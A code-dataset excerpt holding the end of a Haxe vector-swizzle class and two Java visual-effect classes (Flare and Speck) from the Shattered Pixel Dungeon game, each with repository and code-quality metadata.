@:dox(hide) public var xxyz (get, never):Vec4; private function get_xxyz() return Vec4.get(x, x, y, z);
@:dox(hide) public var xxzx (get, never):Vec4; private function get_xxzx() return Vec4.get(x, x, z, x);
@:dox(hide) public var xxzy (get, never):Vec4; private function get_xxzy() return Vec4.get(x, x, z, y);
@:dox(hide) public var xxzz (get, never):Vec4; private function get_xxzz() return Vec4.get(x, x, z, z);
@:dox(hide) public var xyxx (get, never):Vec4; private function get_xyxx() return Vec4.get(x, y, x, x);
@:dox(hide) public var xyxy (get, never):Vec4; private function get_xyxy() return Vec4.get(x, y, x, y);
@:dox(hide) public var xyxz (get, never):Vec4; private function get_xyxz() return Vec4.get(x, y, x, z);
@:dox(hide) public var xyyx (get, never):Vec4; private function get_xyyx() return Vec4.get(x, y, y, x);
@:dox(hide) public var xyyy (get, never):Vec4; private function get_xyyy() return Vec4.get(x, y, y, y);
@:dox(hide) public var xyyz (get, never):Vec4; private function get_xyyz() return Vec4.get(x, y, y, z);
@:dox(hide) public var xyzx (get, never):Vec4; private function get_xyzx() return Vec4.get(x, y, z, x);
@:dox(hide) public var xyzy (get, never):Vec4; private function get_xyzy() return Vec4.get(x, y, z, y);
@:dox(hide) public var xyzz (get, never):Vec4; private function get_xyzz() return Vec4.get(x, y, z, z);
@:dox(hide) public var xzxx (get, never):Vec4; private function get_xzxx() return Vec4.get(x, z, x, x);
@:dox(hide) public var xzxy (get, never):Vec4; private function get_xzxy() return Vec4.get(x, z, x, y);
@:dox(hide) public var xzxz (get, never):Vec4; private function get_xzxz() return Vec4.get(x, z, x, z);
@:dox(hide) public var xzyx (get, never):Vec4; private function get_xzyx() return Vec4.get(x, z, y, x);
@:dox(hide) public var xzyy (get, never):Vec4; private function get_xzyy() return Vec4.get(x, z, y, y);
@:dox(hide) public var xzyz (get, never):Vec4; private function get_xzyz() return Vec4.get(x, z, y, z);
@:dox(hide) public var xzzx (get, never):Vec4; private function get_xzzx() return Vec4.get(x, z, z, x);
@:dox(hide) public var xzzy (get, never):Vec4; private function get_xzzy() return Vec4.get(x, z, z, y);
@:dox(hide) public var xzzz (get, never):Vec4; private function get_xzzz() return Vec4.get(x, z, z, z);
@:dox(hide) public var yxxx (get, never):Vec4; private function get_yxxx() return Vec4.get(y, x, x, x);
@:dox(hide) public var yxxy (get, never):Vec4; private function get_yxxy() return Vec4.get(y, x, x, y);
@:dox(hide) public var yxxz (get, never):Vec4; private function get_yxxz() return Vec4.get(y, x, x, z);
@:dox(hide) public var yxyx (get, never):Vec4; private function get_yxyx() return Vec4.get(y, x, y, x);
@:dox(hide) public var yxyy (get, never):Vec4; private function get_yxyy() return Vec4.get(y, x, y, y);
@:dox(hide) public var yxyz (get, never):Vec4; private function get_yxyz() return Vec4.get(y, x, y, z);
@:dox(hide) public var yxzx (get, never):Vec4; private function get_yxzx() return Vec4.get(y, x, z, x);
@:dox(hide) public var yxzy (get, never):Vec4; private function get_yxzy() return Vec4.get(y, x, z, y);
@:dox(hide) public var yxzz (get, never):Vec4; private function get_yxzz() return Vec4.get(y, x, z, z);
@:dox(hide) public var yyxx (get, never):Vec4; private function get_yyxx() return Vec4.get(y, y, x, x);
@:dox(hide) public var yyxy (get, never):Vec4; private function get_yyxy() return Vec4.get(y, y, x, y);
@:dox(hide) public var yyxz (get, never):Vec4; private function get_yyxz() return Vec4.get(y, y, x, z);
@:dox(hide) public var yyyx (get, never):Vec4; private function get_yyyx() return Vec4.get(y, y, y, x);
@:dox(hide) public var yyyy (get, never):Vec4; private function get_yyyy() return Vec4.get(y, y, y, y);
@:dox(hide) public var yyyz (get, never):Vec4; private function get_yyyz() return Vec4.get(y, y, y, z);
@:dox(hide) public var yyzx (get, never):Vec4; private function get_yyzx() return Vec4.get(y, y, z, x);
@:dox(hide) public var yyzy (get, never):Vec4; private function get_yyzy() return Vec4.get(y, y, z, y);
@:dox(hide) public var yyzz (get, never):Vec4; private function get_yyzz() return Vec4.get(y, y, z, z);
@:dox(hide) public var yzxx (get, never):Vec4; private function get_yzxx() return Vec4.get(y, z, x, x);
@:dox(hide) public var yzxy (get, never):Vec4; private function get_yzxy() return Vec4.get(y, z, x, y);
@:dox(hide) public var yzxz (get, never):Vec4; private function get_yzxz() return Vec4.get(y, z, x, z);
@:dox(hide) public var yzyx (get, never):Vec4; private function get_yzyx() return Vec4.get(y, z, y, x);
@:dox(hide) public var yzyy (get, never):Vec4; private function get_yzyy() return Vec4.get(y, z, y, y);
@:dox(hide) public var yzyz (get, never):Vec4; private function get_yzyz() return Vec4.get(y, z, y, z);
@:dox(hide) public var yzzx (get, never):Vec4; private function get_yzzx() return Vec4.get(y, z, z, x);
@:dox(hide) public var yzzy (get, never):Vec4; private function get_yzzy() return Vec4.get(y, z, z, y);
@:dox(hide) public var yzzz (get, never):Vec4; private function get_yzzz() return Vec4.get(y, z, z, z);
@:dox(hide) public var zxxx (get, never):Vec4; private function get_zxxx() return Vec4.get(z, x, x, x);
@:dox(hide) public var zxxy (get, never):Vec4; private function get_zxxy() return Vec4.get(z, x, x, y);
@:dox(hide) public var zxxz (get, never):Vec4; private function get_zxxz() return Vec4.get(z, x, x, z);
@:dox(hide) public var zxyx (get, never):Vec4; private function get_zxyx() return Vec4.get(z, x, y, x);
@:dox(hide) public var zxyy (get, never):Vec4; private function get_zxyy() return Vec4.get(z, x, y, y);
@:dox(hide) public var zxyz (get, never):Vec4; private function get_zxyz() return Vec4.get(z, x, y, z);
@:dox(hide) public var zxzx (get, never):Vec4; private function get_zxzx() return Vec4.get(z, x, z, x);
@:dox(hide) public var zxzy (get, never):Vec4; private function get_zxzy() return Vec4.get(z, x, z, y);
@:dox(hide) public var zxzz (get, never):Vec4; private function get_zxzz() return Vec4.get(z, x, z, z);
@:dox(hide) public var zyxx (get, never):Vec4; private function get_zyxx() return Vec4.get(z, y, x, x);
@:dox(hide) public var zyxy (get, never):Vec4; private function get_zyxy() return Vec4.get(z, y, x, y);
@:dox(hide) public var zyxz (get, never):Vec4; private function get_zyxz() return Vec4.get(z, y, x, z);
@:dox(hide) public var zyyx (get, never):Vec4; private function get_zyyx() return Vec4.get(z, y, y, x);
@:dox(hide) public var zyyy (get, never):Vec4; private function get_zyyy() return Vec4.get(z, y, y, y);
@:dox(hide) public var zyyz (get, never):Vec4; private function get_zyyz() return Vec4.get(z, y, y, z);
@:dox(hide) public var zyzx (get, never):Vec4; private function get_zyzx() return Vec4.get(z, y, z, x);
@:dox(hide) public var zyzy (get, never):Vec4; private function get_zyzy() return Vec4.get(z, y, z, y);
@:dox(hide) public var zyzz (get, never):Vec4; private function get_zyzz() return Vec4.get(z, y, z, z);
@:dox(hide) public var zzxx (get, never):Vec4; private function get_zzxx() return Vec4.get(z, z, x, x);
@:dox(hide) public var zzxy (get, never):Vec4; private function get_zzxy() return Vec4.get(z, z, x, y);
@:dox(hide) public var zzxz (get, never):Vec4; private function get_zzxz() return Vec4.get(z, z, x, z);
@:dox(hide) public var zzyx (get, never):Vec4; private function get_zzyx() return Vec4.get(z, z, y, x);
@:dox(hide) public var zzyy (get, never):Vec4; private function get_zzyy() return Vec4.get(z, z, y, y);
@:dox(hide) public var zzyz (get, never):Vec4; private function get_zzyz() return Vec4.get(z, z, y, z);
@:dox(hide) public var zzzx (get, never):Vec4; private function get_zzzx() return Vec4.get(z, z, z, x);
@:dox(hide) public var zzzy (get, never):Vec4; private function get_zzzy() return Vec4.get(z, z, z, y);
@:dox(hide) public var zzzz (get, never):Vec4; private function get_zzzz() return Vec4.get(z, z, z, z);
} | 16,046 | Vec3 | hx | en | haxe | code | {"qsc_code_num_words": 2931, "qsc_code_num_chars": 16046.0, "qsc_code_mean_word_length": 3.63800751, "qsc_code_frac_words_unique": 0.07813033, "qsc_code_frac_chars_top_2grams": 0.12585576, "qsc_code_frac_chars_top_3grams": 0.14264278, "qsc_code_frac_chars_top_4grams": 0.17556035, "qsc_code_frac_chars_dupe_5grams": 0.78505111, "qsc_code_frac_chars_dupe_6grams": 0.77595423, "qsc_code_frac_chars_dupe_7grams": 0.2999156, "qsc_code_frac_chars_dupe_8grams": 0.15511582, "qsc_code_frac_chars_dupe_9grams": 0.15511582, "qsc_code_frac_chars_dupe_10grams": 0.1473319, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02840367, "qsc_code_frac_chars_whitespace": 0.15087872, "qsc_code_size_file_byte": 16046.0, "qsc_code_num_lines": 213.0, "qsc_code_num_chars_line_max": 141.0, "qsc_code_num_chars_line_mean": 75.33333333, "qsc_code_frac_chars_alphabet": 0.75420183, "qsc_code_frac_chars_comments": 0.02231086, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00133852, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00076487, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 1, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Flare.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.badlogic.gdx.math.MathUtils;
import com.watabou.gltextures.SmartTexture;
import com.watabou.gltextures.TextureCache;
import com.watabou.glwrap.Blending;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.NoosaScript;
import com.watabou.noosa.Visual;
import com.watabou.utils.PointF;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.FloatBuffer;
import java.nio.ShortBuffer;
public class Flare extends Visual {
private float duration = 0;
private float lifespan;
private boolean lightMode = true;
private SmartTexture texture;
private FloatBuffer vertices;
private ShortBuffer indices;
private int nRays;
public Flare( int nRays, float radius ) {
super( 0, 0, 0, 0 );
int gradient[] = {0xFFFFFFFF, 0x00FFFFFF};
texture = TextureCache.createGradient( gradient );
this.nRays = nRays;
angle = 45;
angularSpeed = 180;
vertices = ByteBuffer.
allocateDirect( (nRays * 2 + 1) * 4 * (Float.SIZE / 8) ).
order( ByteOrder.nativeOrder() ).
asFloatBuffer();
indices = ByteBuffer.
allocateDirect( nRays * 3 * Short.SIZE / 8 ).
order( ByteOrder.nativeOrder() ).
asShortBuffer();
float v[] = new float[4];
v[0] = 0;
v[1] = 0;
v[2] = 0.25f;
v[3] = 0;
vertices.put( v );
v[2] = 0.75f;
v[3] = 0;
for (int i=0; i < nRays; i++) {
float a = i * 3.1415926f * 2 / nRays;
v[0] = MathUtils.cos( a ) * radius;
v[1] = MathUtils.sin( a ) * radius;
vertices.put( v );
a += 3.1415926f * 2 / nRays / 2;
v[0] = MathUtils.cos( a ) * radius;
v[1] = MathUtils.sin( a ) * radius;
vertices.put( v );
indices.put( (short)0 );
indices.put( (short)(1 + i * 2) );
indices.put( (short)(2 + i * 2) );
}
indices.position( 0 );
}
public Flare color( int color, boolean lightMode ) {
this.lightMode = lightMode;
hardlight( color );
return this;
}
public Flare show( Visual visual, float duration ) {
point( visual.center() );
visual.parent.addToBack( this );
lifespan = this.duration = duration;
if (lifespan > 0) scale.set( 0 );
return this;
}
public Flare show( Group parent, PointF pos, float duration ) {
point( pos );
parent.add( this );
lifespan = this.duration = duration;
if (lifespan > 0) scale.set( 0 );
return this;
}
@Override
public void update() {
super.update();
if (duration > 0) {
if ((lifespan -= Game.elapsed) > 0) {
float p = 1 - lifespan / duration; // 0 -> 1
p = p < 0.25f ? p * 4 : (1 - p) * 1.333f;
scale.set( p );
alpha( p );
} else {
killAndErase();
}
}
}
@Override
public void draw() {
super.draw();
if (lightMode) {
Blending.setLightMode();
drawRays();
Blending.setNormalMode();
} else {
drawRays();
}
}
private void drawRays() {
NoosaScript script = NoosaScript.get();
texture.bind();
script.uModel.valueM4( matrix );
script.lighting(
rm, gm, bm, am,
ra, ga, ba, aa );
script.camera( camera );
script.drawElements( vertices, indices, nRays * 3 );
}
}
| 3,965 | Flare | java | en | java | code | {"qsc_code_num_words": 516, "qsc_code_num_chars": 3965.0, "qsc_code_mean_word_length": 4.95155039, "qsc_code_frac_words_unique": 0.37984496, "qsc_code_frac_chars_top_2grams": 0.03170254, "qsc_code_frac_chars_top_3grams": 0.05009785, "qsc_code_frac_chars_top_4grams": 0.03287671, "qsc_code_frac_chars_dupe_5grams": 0.16203523, "qsc_code_frac_chars_dupe_6grams": 0.11272016, "qsc_code_frac_chars_dupe_7grams": 0.09080235, "qsc_code_frac_chars_dupe_8grams": 0.09080235, "qsc_code_frac_chars_dupe_9grams": 0.09080235, "qsc_code_frac_chars_dupe_10grams": 0.09080235, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03398693, "qsc_code_frac_chars_whitespace": 0.22824716, "qsc_code_size_file_byte": 3965.0, "qsc_code_num_lines": 178.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 22.2752809, "qsc_code_frac_chars_alphabet": 0.80098039, "qsc_code_frac_chars_comments": 0.19924338, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.20869565, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00629921, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.05217391, "qsc_codejava_score_lines_no_logic": 0.24347826, "qsc_codejava_frac_words_no_modifier": 0.85714286, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Speck.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.badlogic.gdx.math.MathUtils;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.watabou.noosa.Game;
import com.watabou.noosa.Image;
import com.watabou.noosa.TextureFilm;
import com.watabou.noosa.particles.Emitter;
import com.watabou.utils.ColorMath;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
import com.watabou.utils.SparseArray;
public class Speck extends Image {
public static final int HEALING = 0;
public static final int STAR = 1;
public static final int LIGHT = 2;
public static final int QUESTION = 3;
public static final int UP = 4;
public static final int SCREAM = 5;
public static final int BONE = 6;
public static final int WOOL = 7;
public static final int ROCK = 8;
public static final int NOTE = 9;
public static final int CHANGE = 10;
public static final int HEART = 11;
public static final int BUBBLE = 12;
public static final int STEAM = 13;
public static final int COIN = 14;
public static final int DISCOVER = 101;
public static final int EVOKE = 102;
public static final int MASTERY = 103;
public static final int KIT = 104;
public static final int RATTLE = 105;
public static final int JET = 106;
public static final int TOXIC = 107;
public static final int CORROSION = 108;
public static final int PARALYSIS = 109;
public static final int DUST = 110;
public static final int STENCH = 111;
public static final int FORGE = 112;
public static final int CONFUSION = 113;
public static final int RED_LIGHT = 114;
public static final int CALM = 115;
public static final int SMOKE = 116;
public static final int STORM = 117;
public static final int INFERNO = 118;
public static final int BLIZZARD = 119;
private static final int SIZE = 7;
private int type;
private float lifespan;
private float left;
private static TextureFilm film;
private static SparseArray<Emitter.Factory> factories = new SparseArray<>();
public Speck() {
super();
texture( Assets.SPECKS );
if (film == null) {
film = new TextureFilm( texture, SIZE, SIZE );
}
origin.set( SIZE / 2f );
}
public void reset( int index, float x, float y, int type ) {
revive();
this.type = type;
switch (type) {
case DISCOVER:
case RED_LIGHT:
frame( film.get( LIGHT ) );
break;
case EVOKE:
case MASTERY:
case KIT:
case FORGE:
frame( film.get( STAR ) );
break;
case RATTLE:
frame( film.get( BONE ) );
break;
case JET:
case TOXIC:
case CORROSION:
case PARALYSIS:
case STENCH:
case CONFUSION:
case STORM:
case DUST:
case SMOKE:
case BLIZZARD:
case INFERNO:
frame( film.get( STEAM ) );
break;
case CALM:
frame( film.get( SCREAM ) );
break;
default:
frame( film.get( type ) );
}
this.x = x - origin.x;
this.y = y - origin.y;
resetColor();
scale.set( 1 );
speed.set( 0 );
acc.set( 0 );
angle = 0;
angularSpeed = 0;
switch (type) {
case HEALING:
speed.set( 0, -20 );
lifespan = 1f;
break;
case STAR:
speed.polar( Random.Float( 2 * 3.1415926f ), Random.Float( 128 ) );
acc.set( 0, 128 );
angle = Random.Float( 360 );
angularSpeed = Random.Float( -360, +360 );
lifespan = 1f;
break;
case FORGE:
speed.polar( Random.Float( -3.1415926f ), Random.Float( 64 ) );
acc.set( 0, 128 );
angle = Random.Float( 360 );
angularSpeed = Random.Float( -360, +360 );
lifespan = 0.51f;
break;
case EVOKE:
speed.polar( Random.Float( -3.1415926f ), 50 );
acc.set( 0, 50 );
angle = Random.Float( 360 );
angularSpeed = Random.Float( -180, +180 );
lifespan = 1f;
break;
case KIT:
speed.polar( index * 3.1415926f / 5, 50 );
acc.set( -speed.x, -speed.y );
angle = index * 36;
angularSpeed = 360;
lifespan = 1f;
break;
case MASTERY:
speed.set( Random.Int( 2 ) == 0 ? Random.Float( -128, -64 ) : Random.Float( +64, +128 ), 0 );
angularSpeed = speed.x < 0 ? -180 : +180;
acc.set( -speed.x, 0 );
lifespan = 0.5f;
break;
case RED_LIGHT:
tint(0xFFCC0000);
case LIGHT:
angle = Random.Float( 360 );
angularSpeed = 90;
lifespan = 1f;
break;
case DISCOVER:
angle = Random.Float( 360 );
angularSpeed = 90;
lifespan = 0.5f;
am = 0;
break;
case QUESTION:
lifespan = 0.8f;
break;
case UP:
speed.set( 0, -20 );
lifespan = 1f;
break;
case CALM:
color(0, 1, 1);
case SCREAM:
lifespan = 0.9f;
break;
case BONE:
lifespan = 0.2f;
speed.polar( Random.Float( 2 * 3.1415926f ), 24 / lifespan );
acc.set( 0, 128 );
angle = Random.Float( 360 );
angularSpeed = 360;
break;
case RATTLE:
lifespan = 0.5f;
speed.set( 0, -100 );
acc.set( 0, -2 * speed.y / lifespan );
angle = Random.Float( 360 );
angularSpeed = 360;
break;
case WOOL:
lifespan = 0.5f;
speed.set( 0, -50 );
angle = Random.Float( 360 );
angularSpeed = Random.Float( -360, +360 );
break;
case ROCK:
angle = Random.Float( 360 );
angularSpeed = Random.Float( -360, +360 );
scale.set( Random.Float( 1, 2 ) );
speed.set( 0, 64 );
lifespan = 0.2f;
y -= speed.y * lifespan;
break;
case NOTE:
angularSpeed = Random.Float( -30, +30 );
speed.polar( (angularSpeed - 90) * PointF.G2R, 30 );
lifespan = 1f;
break;
case CHANGE:
angle = Random.Float( 360 );
speed.polar( (angle - 90) * PointF.G2R, Random.Float( 4, 12 ) );
lifespan = 1.5f;
break;
case HEART:
speed.set( Random.Int( -10, +10 ), -40 );
angularSpeed = Random.Float( -45, +45 );
lifespan = 1f;
break;
case BUBBLE:
speed.set( 0, -15 );
scale.set( Random.Float( 0.8f, 1 ) );
lifespan = Random.Float( 0.8f, 1.5f );
break;
case STEAM:
speed.y = -Random.Float( 10, 15 );
angularSpeed = Random.Float( +180 );
angle = Random.Float( 360 );
lifespan = 1f;
break;
case JET:
speed.y = +32;
acc.y = -64;
angularSpeed = Random.Float( 180, 360 );
angle = Random.Float( 360 );
lifespan = 0.5f;
break;
case TOXIC:
hardlight( 0x50FF60 );
angularSpeed = 30;
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 3f );
break;
case CORROSION:
hardlight( 0xAAAAAA );
angularSpeed = 30;
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 3f );
break;
case PARALYSIS:
hardlight( 0xFFFF66 );
angularSpeed = -30;
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 3f );
break;
case STENCH:
hardlight( 0x003300 );
angularSpeed = -30;
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 3f );
break;
case CONFUSION:
hardlight( Random.Int( 0x1000000 ) | 0x000080 );
angularSpeed = Random.Float( -20, +20 );
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 3f );
break;
case STORM:
hardlight( 0x8AD8D8 );
angularSpeed = Random.Float( -20, +20 );
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 3f );
break;
case INFERNO:
hardlight( 0xEE7722 );
angularSpeed = Random.Float( 200, 300 ) * (Random.Int(2) == 0 ? -1 : 1);
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 3f );
break;
case BLIZZARD:
hardlight( 0xFFFFFF );
angularSpeed = Random.Float( 200, 300 ) * (Random.Int(2) == 0 ? -1 : 1);
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 3f );
break;
case SMOKE:
hardlight( 0x000000 );
angularSpeed = 30;
angle = Random.Float( 360 );
lifespan = Random.Float( 1f, 1.5f );
break;
case DUST:
hardlight( 0xFFFF66 );
angle = Random.Float( 360 );
speed.polar( Random.Float( 2 * 3.1415926f ), Random.Float( 16, 48 ) );
lifespan = 0.5f;
break;
case COIN:
speed.polar( -PointF.PI * Random.Float( 0.3f, 0.7f ), Random.Float( 48, 96 ) );
acc.y = 256;
lifespan = -speed.y / acc.y * 2;
break;
}
left = lifespan;
}
@Override
public void update() {
super.update();
left -= Game.elapsed;
if (left <= 0) {
kill();
} else {
float p = 1 - left / lifespan; // 0 -> 1
switch (type) {
case STAR:
case FORGE:
scale.set( 1 - p );
am = p < 0.2f ? p * 5f : (1 - p) * 1.25f;
break;
case KIT:
case MASTERY:
am = 1 - p * p;
break;
case EVOKE:
case HEALING:
am = p < 0.5f ? 1 : 2 - p * 2;
break;
case RED_LIGHT:
case LIGHT:
am = scale.set( p < 0.2f ? p * 5f : (1 - p) * 1.25f ).x;
break;
case DISCOVER:
am = 1 - p;
scale.set( (p < 0.5f ? p : 1 - p) * 2 );
break;
case QUESTION:
scale.set( (float)(Math.sqrt( p < 0.5f ? p : 1 - p ) * 3) );
break;
case UP:
scale.set( (float)(Math.sqrt( p < 0.5f ? p : 1 - p ) * 2) );
break;
case CALM:
case SCREAM:
am = (float)Math.sqrt( (p < 0.5f ? p : 1 - p) * 2f );
scale.set( p * 7 );
break;
case BONE:
case RATTLE:
am = p < 0.9f ? 1 : (1 - p) * 10;
break;
case ROCK:
am = p < 0.2f ? p * 5 : 1 ;
break;
case NOTE:
am = 1 - p * p;
break;
case WOOL:
scale.set( 1 - p );
break;
case CHANGE:
am = (float)Math.sqrt( (p < 0.5f ? p : 1 - p) * 2);
scale.y = (1 + p) * 0.5f;
scale.x = scale.y * MathUtils.cos( left * 15 );
break;
case HEART:
scale.set( 1 - p );
am = 1 - p * p;
break;
case BUBBLE:
am = p < 0.2f ? p * 5 : 1;
break;
case STEAM:
case TOXIC:
case PARALYSIS:
case CONFUSION:
case STORM:
case BLIZZARD:
case INFERNO:
case DUST:
am = (float)Math.sqrt( (p < 0.5f ? p : 1 - p) * 0.5f );
scale.set( 1 + p );
break;
case CORROSION:
hardlight( ColorMath.interpolate( 0xAAAAAA, 0xFF8800 , p ));
case STENCH:
case SMOKE:
am = (float)Math.sqrt( (p < 0.5f ? p : 1 - p) );
scale.set( 1 + p );
break;
case JET:
am = (p < 0.5f ? p : 1 - p) * 2;
scale.set( p * 1.5f );
break;
case COIN:
scale.x = MathUtils.cos( left * 5 );
rm = gm = bm = (Math.abs( scale.x ) + 1) * 0.5f;
am = p < 0.9f ? 1 : (1 - p) * 10;
break;
}
}
}
public static Emitter.Factory factory( final int type ) {
return factory( type, false );
}
public static Emitter.Factory factory( final int type, final boolean lightMode ) {
Emitter.Factory factory = factories.get( type );
if (factory == null) {
factory = new Emitter.Factory() {
@Override
public void emit ( Emitter emitter, int index, float x, float y ) {
Speck p = (Speck)emitter.recycle( Speck.class );
p.reset( index, x, y, type );
}
@Override
public boolean lightMode() {
return lightMode;
}
};
factories.put( type, factory );
}
return factory;
}
}
| 11,840 | Speck | java | en | java | code | {"qsc_code_num_words": 1592, "qsc_code_num_chars": 11840.0, "qsc_code_mean_word_length": 4.3580402, "qsc_code_frac_words_unique": 0.17462312, "qsc_code_frac_chars_top_2grams": 0.09671375, "qsc_code_frac_chars_top_3grams": 0.07062554, "qsc_code_frac_chars_top_4grams": 0.09801095, "qsc_code_frac_chars_dupe_5grams": 0.33107524, "qsc_code_frac_chars_dupe_6grams": 0.28884405, "qsc_code_frac_chars_dupe_7grams": 0.2399827, "qsc_code_frac_chars_dupe_8grams": 0.22369559, "qsc_code_frac_chars_dupe_9grams": 0.19155376, "qsc_code_frac_chars_dupe_10grams": 0.14845777, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.07700484, "qsc_code_frac_chars_whitespace": 0.28488176, "qsc_code_size_file_byte": 11840.0, "qsc_code_num_lines": 515.0, "qsc_code_num_chars_line_max": 97.0, "qsc_code_num_chars_line_mean": 22.99029126, "qsc_code_frac_chars_alphabet": 0.74241172, "qsc_code_frac_chars_comments": 0.06672297, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.56144578, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.01040724, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.01204819, 